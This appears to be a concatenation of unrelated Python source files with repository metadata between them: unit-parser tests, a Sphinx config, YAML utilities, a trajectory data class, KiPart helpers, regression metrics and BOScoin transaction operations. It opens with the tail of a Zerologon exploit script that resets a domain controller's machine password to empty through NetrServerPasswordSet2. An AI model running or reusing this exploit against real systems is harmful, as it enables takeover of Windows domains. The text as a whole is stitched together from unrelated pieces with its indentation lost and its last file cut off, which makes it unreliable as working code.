request = nrpc.NetrServerPasswordSet2()
request['PrimaryName'] = target_computer + '\x00'
request['AccountName'] = target_computer + '$\x00'
request['ComputerName'] = target_computer + '\x00'
request['Authenticator'] = nrpc_Authenticator
request['ClearNewPassword'] = <PASSWORD>
request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
req = rpc_con.request(request)
print("Success")
else:
print('\nAttack failed. Target is probably patched.')
sys.exit(1)
if __name__ == '__main__':
if not (3 <= len(sys.argv) <= 4):
print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
print('Exploits(!!!) a domain controller vulnerable to the Zerologon attack.')
print()
print('Tester script and technical writeup by <NAME> (Secura).')
print()
cprint('Resets DC computer password to empty one. Uses MS-NRPC NetrServerPasswordSet2.', 'white', 'on_red')
print()
print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
sys.exit(1)
else:
[_, dc_name, dc_ip] = sys.argv
dc_name = dc_name.rstrip('$')
perform_attack('\\\\' + dc_name, dc_ip, dc_name)
| 2.0625 | 2 |
tests/test_unit_parser.py | paulculmsee/opennem | 22 | 12761505 | <gh_stars>10-100
import pytest
from opennem.core.unit_parser import parse_unit_duid, parse_unit_number
class TestUnitParser(object):
# Simple
def test_returns_string_one(self):
subj = parse_unit_number("1")
assert subj.id == 1, "Returns string 1 as unit number 1"
assert subj.number == 1, "Unit has one unit"
def test_returns_string_one(self):
subj = parse_unit_number("2")
assert subj.id == 2, "Has unit id of 2"
assert subj.number == 1, "Unit has one unit"
def test_returns_int_one(self):
subj = parse_unit_number(1)
assert subj.id == 1, "Returns int 1 as unit number 1"
assert subj.number == 1, "Unit has one unit"
def test_returns_string_one_padded(self):
subj = parse_unit_number(" 1 ")
assert subj.id == 1, "Returns string 1 as unit number 1"
assert subj.number == 1, "Unit has one unit"
def test_blank_unit_number(self):
subj = parse_unit_number("")
assert subj.id == 1, "Returns string 1 as unit number 1"
assert subj.number == 1, "Unit has one unit"
def test_none_unit_number(self):
subj = parse_unit_number(None)
assert subj.id == 1, "Returns string 1 as unit number 1"
assert subj.number == 1, "Unit has one unit"
# Ranges
def test_simple_range(self):
subj = parse_unit_number("1-2")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 2, "Unit has two units"
def test_simple_range_padded(self):
subj = parse_unit_number("1- 2 ")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 2, "Unit has two units"
def test_range_unit_number(self):
subj = parse_unit_number("1-50")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 50, "Unit has 50 units"
def test_range_unit_number_shifted(self):
subj = parse_unit_number("50-99")
assert subj.id == 50, "Unit has an id of 50"
assert subj.number == 50, "Unit has 50 units"
assert subj.alias == None, "Unit has no alias"
# Aliases
def test_single_has_alias(self):
subj = parse_unit_number("1a")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 1, "Unit has 1 unit"
assert subj.alias == "A", "Unit has alias of A"
def test_single_has_alias_prepend(self):
subj = parse_unit_number("WT1")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 1, "Unit has 1 unit"
assert subj.alias == "WT", "Unit has alias of WT"
def test_single_long_alias(self):
subj = parse_unit_number("WKIEWA1")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 1, "Unit has 1 unit"
assert subj.alias == "WKIEWA", "Unit has alias of WKIEWA"
def test_single_has_alias_prepend_space(self):
subj = parse_unit_number("WT 1")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 1, "Unit has 1 unit"
assert subj.alias == "WT", "Unit has alias of WT"
def test_range_has_alias(self):
subj = parse_unit_number("1-2a")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 2, "Unit has 2 unit"
assert subj.alias == "A", "Unit has alias of A"
def test_range_has_alias_prepend(self):
subj = parse_unit_number("WT1-2")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 2, "Unit has 2 unit"
assert subj.alias == "WT", "Unit has alias of WT"
def test_range_has_alias_prepend_space(self):
subj = parse_unit_number("WT 1-2")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 2, "Unit has 2 unit"
assert subj.alias == "WT", "Unit has alias of WT"
# Force single
def test_force_single(self):
subj = parse_unit_number("GT 1-2", force_single=True)
assert subj.id == 2, "Unit has an id of 2"
assert subj.number == 1, "Unit has 1 unit"
assert subj.alias == "GT1", "Unit has alias of GT1"
# Multi units in one line
def test_ampersand(self):
subj = parse_unit_number("1 & 2")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 2, "Unit has 2 units"
assert subj.alias == None, "Unit has no alias"
def test_ampersand_three(self):
subj = parse_unit_number("1 & 2 & 3")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 3, "Unit has 3 units"
assert subj.alias == None, "Unit has no alias"
def test_comma_separated(self):
subj = parse_unit_number("1,2")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 2, "Unit has 2 units"
assert subj.alias == None, "Unit has no alias"
def test_comma_separated_single(self):
subj = parse_unit_number("GT 1-2,GT 1-4", force_single=True)
assert subj.id == 2, "Unit has an id of 1"
assert subj.number == 2, "Unit has 2 units"
assert subj.alias == "GT1", "Unit has GT1 alias"
def test_comma_and_ampersand_separated(self):
subj = parse_unit_number("1, 2 & 5,3 & 4")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 5, "Unit has 5 units"
assert subj.alias == None, "Unit has no alias"
class TestUnitDuidParser(object):
def test_unit_duid(self):
subj = parse_unit_duid("WT1-2", "NONE")
assert subj.id == 1, "Unit has an id of 1"
assert subj.number == 2, "Unit has 2 unit"
assert subj.alias == "WT", "Unit has alias of WT"
def test_unit_duid_single(self):
subj = parse_unit_duid("GT 1-2", "AGLHAL")
assert subj.id == 2, "Unit has an id of 2"
assert subj.number == 1, "Unit has 1 unit"
assert subj.alias == "GT1", "Unit has alias of GT1"
| 2.8125 | 3 |
docs/conf.py | tino/cairocffi | 0 | 12761506 | import re
import os
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx',
'sphinx.ext.coverage']
master_doc = 'index'
project = 'cairocffi'
copyright = '2013, <NAME>'
release = re.search(
"VERSION = '([^']+)'",
open(os.path.join(os.path.dirname(__file__), os.pardir,
'cairocffi', '__init__.py')).read().strip()).group(1)
version = '.'.join(release.split('.')[:2])
exclude_patterns = ['_build']
autodoc_member_order = 'bysource'
autodoc_default_flags = ['members']
intersphinx_mapping = {
'http://docs.python.org/': None,
'http://cairographics.org/documentation/pycairo/2/': None}
| 1.59375 | 2 |
analysis/rulebased/utils.py | VaCH2/tosca-analysis | 0 | 12761507 | <reponame>VaCH2/tosca-analysis<gh_stars>0
import os
def get_yaml_files(path):
'''Get the paths for all the yaml files'''
extensions = ['.yaml', '.yml']
allFiles = []
listOfFile = os.listdir(path)
for entry in listOfFile:
fullPath = os.path.join(path, entry)
if os.path.isdir(fullPath):
allFiles = allFiles + get_yaml_files(fullPath)
else:
for extension in extensions:
if fullPath.endswith(extension):
allFiles.append(fullPath)
return allFiles
def keyValueList(d):
"""
This function iterates over all the key-value pairs of a dictionary and returns a list of tuple (key, value).
d -- a dictionary to iterate through
"""
if not isinstance(d, dict) and not isinstance(d, list):
return []
keyvalues = []
if isinstance(d, list):
for entry in d:
if isinstance(entry, dict):
keyvalues.extend(keyValueList(entry))
else:
for k, v in d.items():
if k is None or v is None:
continue
keyvalues.append((k, v))
keyvalues.extend(keyValueList(v))
return keyvalues
def calculate_depth(f):
'''https://stackoverflow.com/questions/45964731/how-to-parse-hierarchy-based-on-indents-with-python'''
indentation = []
indentation.append(0)
depth = 0
results = []
for line in f:
line = line[:-1]
content = line.strip()
indent = len(line) - len(content)
if indent > indentation[-1]:
depth += 1
indentation.append(indent)
elif indent < indentation[-1]:
while indent < indentation[-1]:
depth -= 1
indentation.pop()
# if indent != indentation[-1]:
# raise RuntimeError("Bad formatting")
results.append((content, depth))
return results | 2.984375 | 3 |
data_obj.py | justinfocus12/SHORT | 1 | 12761508 | <gh_stars>1-10
# This is where the Data object lives
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
matplotlib.use('pdf')
matplotlib.rcParams['font.size'] = 17
matplotlib.rcParams['font.family'] = 'serif'
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
def fmt(num,pos):
return '{:.1e}'.format(num)
def both_grids(bounds,shp):
# This time shp is the number of cells
Nc = np.prod(shp-1) # Number of centers Ne = np.prod(shp) # Number of edges
center_grid = np.array(np.unravel_index(np.arange(Nc),shp-1)).T
edge_grid = np.array(np.unravel_index(np.arange(Ne),shp)).T
dx = (bounds[:,1] - bounds[:,0])/(shp - 1)
center_grid = bounds[:,0] + dx * (center_grid + 0.5)
edge_grid = bounds[:,0] + dx * edge_grid
return center_grid,edge_grid,dx
class Data:
def __init__(self,x_short,t_short,lag_time_seq):
# bdy_dist just needs to be zero on the boundaries
Nt,self.nshort,self.xdim = x_short.shape
self.traj_length = len(lag_time_seq)
self.X = np.zeros((self.nshort,self.traj_length,self.xdim))
self.t_x = np.zeros(self.traj_length)
time_indices = np.zeros(self.traj_length,dtype=int)
for i in range(self.traj_length):
time_indices[i] = np.argmin(np.abs(t_short-lag_time_seq[i]))
self.X[:,i,:] = x_short[time_indices[i]]
self.t_x[i] = t_short[time_indices[i]]
#self.X = x_short[0]
#self.t_x = t_short[0]*np.ones(self.nshort)
##print("self.X.shape = {}".format(self.X.shape))
#ti_y = np.argmin(np.abs(t_short-lag_time))
#self.Y = x_short[ti_y]
#self.t_y = t_short[ti_y]*np.ones(self.nshort)
##print("self.Y.shape = {}".format(self.Y.shape))
#self.lag_time = lag_time
#ti_xp = np.zeros(self.nshort, dtype=int)
#ti_yp = ti_y*np.ones(self.nshort, dtype=int)
#for j in range(min(ti_y,Nt)):
# db = bdy_dist(x_short[j])
# bdy_idx = np.where(db==0)[0]
# if len(bdy_idx) > 0:
# if j > 0:
# ti_yp[bdy_idx] = np.minimum(j,ti_yp[bdy_idx])
# if j < min(ti_y,Nt)-1:
# ti_xp[bdy_idx] = np.maximum(j, ti_xp[bdy_idx])
#self.Yp = x_short[ti_yp,np.arange(self.nshort)]
#self.t_yp = t_short[ti_yp]
##print("std of t_yp = {}".format(np.std(self.t_yp)))
##print("Fraction of hits = {}".format(np.mean(self.t_yp < self.lag_time)))
#self.Xp = x_short[ti_xp,np.arange(self.nshort)]
#self.t_xp = t_short[ti_xp]
##print("self.Yp.shape = {}".format(self.Yp.shape))
##print("self.Xp.shape = {}".format(self.Xp.shape))
## Get all the distance arrays
#self.bdy_dist_x = bdy_dist(self.X)
#self.bdy_dist_y = bdy_dist(self.Y)
#self.bdy_dist_xp = bdy_dist(self.Xp)
#self.bdy_dist_yp = bdy_dist(self.Yp)
#self.bdy_idx_x = np.where(self.bdy_dist_x==0)[0]
#self.iidx_x = np.where(self.bdy_dist_x!=0)[0]
#self.bdy_idx_y = np.where(self.bdy_dist_y==0)[0]
#self.iidx_y = np.where(self.bdy_dist_y!=0)[0]
#self.bdy_idx_xp = np.where(self.bdy_dist_xp==0)[0]
#self.iidx_xp = np.where(self.bdy_dist_xp!=0)[0]
#self.bdy_idx_yp = np.where(self.bdy_dist_yp==0)[0]
#self.iidx_yp = np.where(self.bdy_dist_yp!=0)[0]
return
def concatenate_data(self,other):
# fold in a whole nother dataset
self.X = np.concatenate((self.X,other.X),axis=0)
#self.Y = np.concatenate((self.Y,other.Y),axis=0)
#self.Xp = np.concatenate((self.Xp,other.Xp),axis=0)
#self.Yp = np.concatenate((self.Yp,other.Yp),axis=0)
#self.bdy_idx_x = np.where(bdy_dist(self.X)==0)[0]
#self.iidx_x = np.where(bdy_dist(self.X)!=0)[0]
#self.bdy_idx_y = np.where(bdy_dist(self.Y)==0)[0]
#self.iidx_y = np.where(bdy_dist(self.Y)!=0)[0]
#self.t_x = np.concatenate((self.t_x,other.t_x))
#self.t_y = np.concatenate((self.t_y,other.t_y))
#self.t_xp = np.concatenate((self.t_xp,other.t_xp))
#self.t_yp = np.concatenate((self.t_yp,other.t_yp))
self.nshort += other.nshort
#self.bdy_dist_x = bdy_dist(self.X)
#self.bdy_dist_y = bdy_dist(self.Y)
#self.bdy_dist_xp = bdy_dist(self.Xp)
#self.bdy_dist_yp = bdy_dist(self.Yp)
#self.bdy_idx_x = np.where(self.bdy_dist_x==0)[0]
#self.iidx_x = np.where(self.bdy_dist_x!=0)[0]
#self.bdy_idx_y = np.where(self.bdy_dist_y==0)[0]
#self.iidx_y = np.where(self.bdy_dist_y!=0)[0]
#self.bdy_idx_xp = np.where(self.bdy_dist_xp==0)[0]
#self.iidx_xp = np.where(self.bdy_dist_xp!=0)[0]
#self.bdy_idx_yp = np.where(self.bdy_dist_yp==0)[0]
#self.iidx_yp = np.where(self.bdy_dist_yp!=0)[0]
return
def insert_boundaries(self,bdy_dist,lag_time_max=None):
if lag_time_max is None: lag_time_max=self.t_x[-1]
# Find the last-exit and first-entry points
bdy_dist_x = bdy_dist(self.X.reshape((self.nshort*self.traj_length,self.xdim))).reshape((self.nshort,self.traj_length))
self.last_entry_idx = np.zeros(self.nshort,dtype=int)
ti_max = np.argmin(np.abs(lag_time_max - self.t_x))
self.last_idx = ti_max*np.ones(self.nshort,dtype=int) # for yj
self.first_exit_idx = ti_max*np.ones(self.nshort,dtype=int)
for i in range(ti_max):
db = bdy_dist(self.X[:,i,:])
bidx = np.where(db==0)[0]
if i < self.traj_length-1:
self.last_entry_idx[bidx] = i
if i > 0:
self.first_exit_idx[bidx] = np.minimum(self.first_exit_idx[bidx],i)
return
def insert_boundaries_fwd(self,bdy_dist_x,tmin,tmax):
if tmin > tmax: sys.exit("HEY! Make sure tmin < tmax in insert_boundaries_fwd")
#bdy_dist_x = bdy_dist(self.X.reshape((self.nshort*self.traj_length,self.xdim))).reshape((self.nshort,self.traj_length))
ti_min = np.argmin(np.abs(tmin - self.t_x))
ti_max = np.argmin(np.abs(tmax - self.t_x))
self.base_idx_fwd = ti_min*np.ones(self.nshort,dtype=int)
self.first_exit_idx_fwd = ti_max*np.ones(self.nshort,dtype=int)
self.last_idx_fwd = ti_max*np.ones(self.nshort,dtype=int)
for i in np.arange(ti_max-1,ti_min,-1):
bidx = np.where(bdy_dist_x[:,i]==0)[0]
self.first_exit_idx_fwd[bidx] = i
return
def insert_boundaries_bwd(self,bdy_dist_x,tmax,tmin):
if tmin > tmax: sys.exit("HEY! Make sure tmax > tmin in insert_boundaries_bwd")
#bdy_dist_x = bdy_dist(self.X.reshape((self.nshort*self.traj_length,self.xdim))).reshape((self.nshort,self.traj_length))
ti_min = np.argmin(np.abs(tmin - self.t_x))
ti_max = np.argmin(np.abs(tmax - self.t_x))
self.base_idx_bwd = ti_max*np.ones(self.nshort,dtype=int)
self.first_exit_idx_bwd = ti_min*np.ones(self.nshort,dtype=int)
self.last_idx_bwd = ti_min*np.ones(self.nshort,dtype=int)
for i in np.arange(ti_min+1,ti_max,1):
bidx = np.where(bdy_dist_x[:,i]==0)[0]
self.first_exit_idx_bwd[bidx] = i
return
| 2.296875 | 2 |
kipart/common.py | xesscorp/KiPart | 133 | 12761509 | <gh_stars>100-1000
# MIT license
#
# Copyright (C) 2015-2021 by <NAME>.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import print_function
import csv
import difflib
import os.path
import re
from builtins import object
import openpyxl
from .py_2_3 import *
COLUMN_NAMES = {
"pin": "num",
"num": "num",
"name": "name",
"type": "type",
"style": "style",
"side": "side",
"unit": "unit",
"bank": "unit",
"hidden": "hidden",
"": "", # Blank column names stay blank.
}
# This is just a vanilla object class for device pins.
# We'll add attributes to it as needed.
class Pin(object):
pass
DEFAULT_PIN = Pin()
DEFAULT_PIN.num = None
DEFAULT_PIN.name = ""
DEFAULT_PIN.type = "io"
DEFAULT_PIN.style = "line"
DEFAULT_PIN.unit = 1
DEFAULT_PIN.side = "left"
DEFAULT_PIN.hidden = "no"
def num_row_elements(row):
"""Get number of elements in CSV row."""
try:
rowset = set(row)
rowset.discard("")
return len(rowset)
except TypeError:
return 0
def get_nonblank_row(csv_reader):
"""Return the first non-blank row encountered from the current point in a CSV file."""
for row in csv_reader:
if num_row_elements(row) > 0:
return row
return []
def get_part_info(csv_reader):
"""Get the part number, ref prefix, footprint, MPN, datasheet link, and description from a row of the CSV file."""
# Read the first, nonblank row and pad it with None's to make sure it's long enough.
(
part_num,
part_ref_prefix,
part_footprint,
part_manf_num,
part_datasheet,
part_desc,
) = list(get_nonblank_row(csv_reader) + [None] * 6)[:6]
# Put in the default part reference identifier if it isn't present.
if part_ref_prefix in (None, "", " "):
part_ref_prefix = "U"
# Check to see if the row with the part identifier is missing.
if part_num and part_num.lower() in list(COLUMN_NAMES.keys()):
issue("Row with part number is missing in CSV file.", "error")
return (
part_num,
part_ref_prefix,
part_footprint,
part_manf_num,
part_datasheet,
part_desc,
)
def find_closest_match(name, name_dict, fuzzy_match, threshold=0.0):
"""Approximate matching subroutine"""
# Scrub non-alphanumerics from name and lowercase it.
scrubber = re.compile("[\W.]+")
name = scrubber.sub("", name).lower()
# Return regular dictionary lookup if fuzzy matching is not enabled.
if fuzzy_match == False:
return name_dict[name]
# Find the closest fuzzy match to the given name in the scrubbed list.
# Set the matching threshold to 0 so it always gives some result.
match = difflib.get_close_matches(name, list(name_dict.keys()), 1, threshold)[0]
return name_dict[match]
def clean_headers(headers):
"""Return a list of the closest valid column headers for the headers found in the file."""
return [find_closest_match(h, COLUMN_NAMES, True) for h in headers]
def issue(msg, level="warning"):
if level == "warning":
print("Warning: {}".format(msg))
elif level == "error":
print("ERROR: {}".format(msg))
raise Exception("Unrecoverable error")
else:
print(msg)
def fix_pin_data(pin_data, part_num):
"""Fix common errors in pin data."""
fixed_pin_data = pin_data.strip() # Remove leading/trailing spaces.
if re.search("\s", fixed_pin_data) is not None:
fixed_pin_data = re.sub("\s", "_", fixed_pin_data)
issue(
"Replaced whitespace with '_' in pin '{pin_data}' of part {part_num}.".format(
**locals()
)
)
return fixed_pin_data
def is_xlsx(filename):
return os.path.splitext(filename)[1] == ".xlsx"
def convert_xlsx_to_csv(xlsx_file, sheetname=None):
"""
Convert sheet of an Excel workbook into a CSV file in the same directory
and return the read handle of the CSV file.
"""
wb = openpyxl.load_workbook(xlsx_file)
if sheetname:
sh = wb[sheetname]
else:
sh = wb.active
if USING_PYTHON2:
# Python 2 doesn't accept newline parameter when opening file.
newline = {}
else:
# kipart fails on Python 3 unless file is opened with this newline.
newline = {"newline": ""}
csv_filename = "xlsx_to_csv_file.csv"
with open(csv_filename, "w", **newline) as f:
col = csv.writer(f)
for row in sh.rows:
try:
col.writerow([cell.value for cell in row])
except UnicodeEncodeError:
for cell in row:
if cell.value:
cell.value = "".join([c for c in cell.value if ord(c) < 128])
col.writerow([cell.value for cell in row])
return open(csv_filename, "r")
| 2.03125 | 2 |
vnpy/app/realtime_monitor/ui/__init__.py | xyh888/vnpy | 5 | 12761510 | #!/usr/bin/python
# -*- coding:utf-8 -*-
"""
@author:Hadrianl
"""
from .widget import CandleChartWidget | 0.980469 | 1 |
webinterface/src/WebComponents/Sources/CurrentService.py | Mariusz1970/enigma2-plugins-1 | 41 | 12761511 | from Components.Sources.Source import Source
class CurrentService(Source):
def __init__(self, session):
Source.__init__(self)
self.session = session
def command(self):
currentServiceRef = self.session.nav.getCurrentlyPlayingServiceReference()
if currentServiceRef is not None:
text = currentServiceRef.toString()
else:
text = "N/A"
return text
text = property(command)
| 2.34375 | 2 |
tests/test_utilities_table_utilities.py | Kokitis/pyregions | 0 | 12761512 | from pyregions.utilities import table_utilities
import pytest
@pytest.mark.parametrize(
"columns,expected",
[
(['abc', '123', 456], ['123',456]),
(["13.4", 'aslkjnsf12312ll'], ['13.4'])
]
)
def test_get_numeric_columns(columns, expected):
result = table_utilities.get_numeric_columns(columns)
assert result == expected
@pytest.mark.parametrize(
"value,expected",
[
("abc.tsv", '\t'),
("assssdawrfa.csv", ','),
("a.tab", "\t")
]
)
def test_get_delimiter(value, expected):
assert table_utilities._get_delimiter(value) == expected | 2.71875 | 3 |
analysis-master/tra_analysis/RegressionMetric.py | titanscouting/tra-analysis | 2 | 12761513 | <filename>analysis-master/tra_analysis/RegressionMetric.py
# Titan Robotics Team 2022: RegressionMetric submodule
# Written by <NAME>
# Notes:
# this should be imported as a python module using 'from tra_analysis import RegressionMetric'
# setup:
__version__ = "1.0.0"
__changelog__ = """changelog:
1.0.0:
- ported analysis.RegressionMetric() here
"""
__author__ = (
"<NAME> <<EMAIL>>",
)
__all__ = [
'RegressionMetric'
]
import numpy as np
import sklearn
from sklearn import metrics
class RegressionMetric():
def __new__(cls, predictions, targets):
return cls.r_squared(cls, predictions, targets), cls.mse(cls, predictions, targets), cls.rms(cls, predictions, targets)
def r_squared(self, predictions, targets): # assumes equal size inputs
return sklearn.metrics.r2_score(targets, predictions)
def mse(self, predictions, targets):
return sklearn.metrics.mean_squared_error(targets, predictions)
def rms(self, predictions, targets):
return np.sqrt(sklearn.metrics.mean_squared_error(targets, predictions)) | 1.859375 | 2 |
boscoin_base/operation.py | jinhwanlazy/py-boscoin-base | 4 | 12761514 | # coding: utf-8
import base64
from decimal import *
from .asset import Asset
from .stellarxdr import Xdr
from .utils import account_xdr_object, signer_key_xdr_object, encode_check, best_rational_approximation as best_r, division, decode_check
from .utils import XdrLengthError, DecodeError
ONE = Decimal(10 ** 7)
class Operation(object):
"""what we can do in stellar network.
follow the specific . the source can be none.
"""
def __init__(self, opts):
assert type(opts) is dict
self.source = opts.get('source')
self.body = Xdr.nullclass()
def __eq__(self, other):
return self.xdr() == other.xdr()
def to_xdr_object(self):
try:
source_account = [account_xdr_object(self.source)]
except TypeError:
source_account = []
return Xdr.types.Operation(source_account, self.body)
def xdr(self):
op = Xdr.StellarXDRPacker()
op.pack_Operation(self.to_xdr_object())
return base64.b64encode(op.get_buffer())
@staticmethod
def to_xdr_amount(value):
if not isinstance(value, str):
raise Exception("value must be a string")
# throw exception if value * ONE has decimal places (it can't be represented as int64)
return int((Decimal(value) * ONE).to_integral_exact(context=Context(traps=[Inexact])))
@staticmethod
def from_xdr_amount(value):
return str(Decimal(value) / ONE)
@classmethod
def from_xdr(cls, xdr):
xdr_decode = base64.b64decode(xdr)
op = Xdr.StellarXDRUnpacker(xdr_decode)
op = op.unpack_Operation()
if op.type == Xdr.const.CREATE_ACCOUNT:
return CreateAccount.from_xdr_object(op)
elif op.type == Xdr.const.PAYMENT:
return Payment.from_xdr_object(op)
elif op.type == Xdr.const.PATH_PAYMENT:
return PathPayment.from_xdr_object(op)
elif op.type == Xdr.const.CHANGE_TRUST:
return ChangeTrust.from_xdr_object(op)
elif op.type == Xdr.const.ALLOW_TRUST:
return AllowTrust.from_xdr_object(op)
elif op.type == Xdr.const.SET_OPTIONS:
return SetOptions.from_xdr_object(op)
elif op.type == Xdr.const.MANAGE_OFFER:
return ManageOffer.from_xdr_object(op)
elif op.type == Xdr.const.CREATE_PASSIVE_OFFER:
return CreatePassiveOffer.from_xdr_object(op)
elif op.type == Xdr.const.ACCOUNT_MERGE:
return AccountMerge.from_xdr_object(op)
elif op.type == Xdr.const.INFLATION:
return Inflation.from_xdr_object(op)
elif op.type == Xdr.const.MANAGE_DATA:
return ManageData.from_xdr_object(op)
class CreateAccount(Operation):
def __init__(self, opts):
super(CreateAccount, self).__init__(opts)
self.destination = opts.get('destination')
self.starting_balance = opts.get('starting_balance')
def to_xdr_object(self):
destination = account_xdr_object(self.destination)
create_account_op = Xdr.types.CreateAccountOp(destination, Operation.to_xdr_amount(self.starting_balance))
self.body.type = Xdr.const.CREATE_ACCOUNT
self.body.createAccountOp = create_account_op
return super(CreateAccount, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
destination = encode_check('account', op_xdr_object.body.createAccountOp.destination.ed25519).decode()
starting_balance = Operation.from_xdr_amount(op_xdr_object.body.createAccountOp.startingBalance)
return cls({
'source': source,
'destination': destination,
'starting_balance': starting_balance,
})
class Payment(Operation):
def __init__(self, opts):
super(Payment, self).__init__(opts)
self.destination = opts.get('destination')
self.asset = opts.get('asset')
self.amount = opts.get('amount')
def to_xdr_object(self):
asset = self.asset.to_xdr_object()
destination = account_xdr_object(self.destination)
amount = Operation.to_xdr_amount(self.amount)
payment_op = Xdr.types.PaymentOp(destination, asset, amount)
self.body.type = Xdr.const.PAYMENT
self.body.paymentOp = payment_op
return super(Payment, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
destination = encode_check('account', op_xdr_object.body.paymentOp.destination.ed25519).decode()
asset = Asset.from_xdr_object(op_xdr_object.body.paymentOp.asset)
amount = Operation.from_xdr_amount(op_xdr_object.body.paymentOp.amount)
return cls({
'source': source,
'destination': destination,
'asset': asset,
'amount': amount,
})
class PathPayment(Operation):
def __init__(self, opts):
super(PathPayment, self).__init__(opts)
self.destination = opts.get('destination')
self.send_asset = opts.get('send_asset')
self.send_max = opts.get('send_max')
self.dest_asset = opts.get('dest_asset')
self.dest_amount = opts.get('dest_amount')
self.path = opts.get('path') # a list of paths/assets
def to_xdr_object(self):
destination = account_xdr_object(self.destination)
send_asset = self.send_asset.to_xdr_object()
dest_asset = self.dest_asset.to_xdr_object()
path_payment = Xdr.types.PathPaymentOp(send_asset, Operation.to_xdr_amount(self.send_max), destination,
dest_asset, Operation.to_xdr_amount(self.dest_amount), self.path)
self.body.type = Xdr.const.PATH_PAYMENT
self.body.pathPaymentOp = path_payment
return super(PathPayment, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
destination = encode_check('account', op_xdr_object.body.pathPaymentOp.destination.ed25519).decode()
send_asset = Asset.from_xdr_object(op_xdr_object.body.pathPaymentOp.sendAsset)
dest_asset = Asset.from_xdr_object(op_xdr_object.body.pathPaymentOp.destAsset)
send_max = Operation.from_xdr_amount(op_xdr_object.body.pathPaymentOp.sendMax)
dest_amount = Operation.from_xdr_amount(op_xdr_object.body.pathPaymentOp.destAmount)
path = []
if op_xdr_object.body.pathPaymentOp.path:
for x in op_xdr_object.body.pathPaymentOp.path:
path.append(Asset.from_xdr_object(x))
return cls({
'source': source,
'destination': destination,
'send_asset': send_asset,
'send_max': send_max,
'dest_asset': dest_asset,
'dest_amount': dest_amount,
'path': path
})
class ChangeTrust(Operation):
def __init__(self, opts):
super(ChangeTrust, self).__init__(opts)
self.line = opts.get('asset')
if opts.get('limit') is not None:
self.limit = opts.get('limit')
else:
self.limit = "922337203685.4775807"
def to_xdr_object(self):
line = self.line.to_xdr_object()
limit = Operation.to_xdr_amount(self.limit)
change_trust_op = Xdr.types.ChangeTrustOp(line, limit)
self.body.type = Xdr.const.CHANGE_TRUST
self.body.changeTrustOp = change_trust_op
return super(ChangeTrust, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
line = Asset.from_xdr_object(op_xdr_object.body.changeTrustOp.line)
print(line)
limit = Operation.from_xdr_amount(op_xdr_object.body.changeTrustOp.limit)
return cls({
'source': source,
'asset': line,
'limit': limit
})
class AllowTrust(Operation):
def __init__(self, opts):
super(AllowTrust, self).__init__(opts)
self.trustor = opts.get('trustor')
self.asset_code = opts.get('asset_code')
self.authorize = opts.get('authorize')
def to_xdr_object(self):
trustor = account_xdr_object(self.trustor)
length = len(self.asset_code)
assert length <= 12
pad_length = 4 - length if length <= 4 else 12 - length
# asset_code = self.asset_code + '\x00' * pad_length
# asset_code = bytearray(asset_code, encoding='utf-8')
asset_code = bytearray(self.asset_code, 'ascii') + b'\x00' * pad_length
asset = Xdr.nullclass()
if len(asset_code) == 4:
asset.type = Xdr.const.ASSET_TYPE_CREDIT_ALPHANUM4
asset.assetCode4 = asset_code
else:
asset.type = Xdr.const.ASSET_TYPE_CREDIT_ALPHANUM12
asset.assetCode12 = asset_code
allow_trust_op = Xdr.types.AllowTrustOp(trustor, asset, self.authorize)
self.body.type = Xdr.const.ALLOW_TRUST
self.body.allowTrustOp = allow_trust_op
return super(AllowTrust, self).to_xdr_object()
@classmethod
def from_xdr_object(cls, op_xdr_object):
if not op_xdr_object.sourceAccount:
source = None
else:
source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
trustor = encode_check('account', op_xdr_object.body.allowTrustOp.trustor.ed25519).decode()
